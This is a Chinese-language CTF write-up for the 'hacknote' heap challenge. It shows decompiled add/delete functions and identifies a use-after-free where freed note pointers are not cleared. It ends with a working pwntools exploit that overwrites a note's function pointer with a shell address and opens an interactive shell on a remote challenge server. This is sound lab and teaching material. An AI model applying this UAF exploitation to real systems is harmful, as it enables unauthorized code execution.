1.checksec
32位的堆题,只开了一个保护,应该很简单,不会很难
2.IDA
还给了bin/sh字符串,直接返回到0x8048945利用就行
add()函数
int add_note()
{
int result; // eax
int v1; // esi
char buf[8]; // [esp+0h] [ebp-18h] BYREF
size_t size; // [esp+8h] [ebp-10h]
int i; // [esp+Ch] [ebp-Ch]
result = count;
if ( count > 5 )
return puts("Full");
for ( i = 0; i <= 4; ++i )
{
result = *((_DWORD *)¬elist + i);
if ( !result )
{
*((_DWORD *)¬elist + i) = malloc(8u);
if ( !*((_DWORD *)¬elist + i) )
{
puts("Alloca Error");
exit(-1);
}
**((_DWORD **)¬elist + i) = print_note_content;
printf("Note size :");
read(0, buf, 8u);
size = atoi(buf);
v1 = *((_DWORD *)¬elist + i);
*(_DWORD *)(v1 + 4) = malloc(size);
if ( !*(_DWORD *)(*((_DWORD *)¬elist + i) + 4) )
{
puts("Alloca Error");
exit(-1);
}
printf("Content :");
read(0, *(void **)(*((_DWORD *)¬elist + i) + 4), size);
puts("Success !");
return ++count;
}
}
return result;
}
创建堆块,通过print_note_content;函数打印堆块中的内容
delete()函数
int del_note()
{
int result; // eax
char buf[4]; // [esp+8h] [ebp-10h] BYREF
int v2; // [esp+Ch] [ebp-Ch]
printf("Index :");
read(0, buf, 4u);
v2 = atoi(buf);
if ( v2 < 0 || v2 >= count )
{
puts("Out of bound!");
_exit(0);
}
result = *((_DWORD *)¬elist + v2);
if ( result )
{
free(*(void **)(*((_DWORD *)¬elist + v2) + 4));
free(*((void **)¬elist + v2));
return puts("Success");
}
return result;
}
free之后没有置NULL,可以再次利用,题目的提示UAF
先释放了有内容的堆块,然后释放了整个堆块
3.EXP
from pwn import*
r=remote('node4.buuoj.cn',25834)
#r=process('./hacknote')
def add(size,content):
r.sendlineafter('choice :','1')
r.sendlineafter('Note size :',str(size))
r.sendlineafter('Content :',content)
def delete(idx):
r.sendlineafter('choice :','2')
r.sendlineafter('Index :',str(idx))
def printf(idx):
r.sendlineafter('choice :','3')
r.sendlineafter('Index :',str(idx))
shell_addr=0x8048945
add(48,'aaaa')
add(48,'bbbb')
#gdb.attach(r)
delete(0)
delete(1)
add(8,p32(shell_addr))
printf(0)
r.interactive()